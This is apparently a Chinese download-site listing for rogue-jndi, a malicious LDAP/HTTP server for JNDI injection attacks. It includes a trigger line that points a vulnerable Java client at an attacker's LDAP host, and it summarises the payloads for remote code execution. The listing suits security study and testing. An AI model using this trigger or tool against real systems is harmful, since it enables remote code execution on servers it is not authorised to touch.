【文件属性】：
文件名称：rogue-jndi:用于JNDI注入攻击的恶意LDAP服务器
文件大小：20KB
文件格式：ZIP
更新时间：2021-05-04 20:47:06
Java 流氓JNDI 用于JNDI注入攻击的恶意LDAP服务器。 描述 该项目包含LDAP和HTTP服务器，用于利用默认情况下不安全的Java JNDI API。 为了执行攻击，您可以在本地启动这些服务器，然后在易受攻击的客户端上触发JNDI解析，例如： InitialContext . doLookup( " ldap://your_server.com:1389/o=reference " ); 它将启动从易受攻击的客户端到本地LDAP服务器的连接。 然后，本地服务器使用包含有效载荷之一的恶意条目进行响应，这对于实现远程代码执行很有用。 动机 除了已知的JNDI攻击方法（通过引用中的远程类加载）之外，此工具还利用的功能带来了新的攻击媒介。 支持的有效载荷 经典的JNDI攻击，通过远程类加载导致RCE，可达到jdk8u191 通过org.apache.naming.factory.Bea
【文件预览】：
rogue-jndi-master
----.gitignore(120B)
----src()
--------main()
--------test()
----LICENSE(1KB)
----pom.xml(3KB)
----README.md(5KB)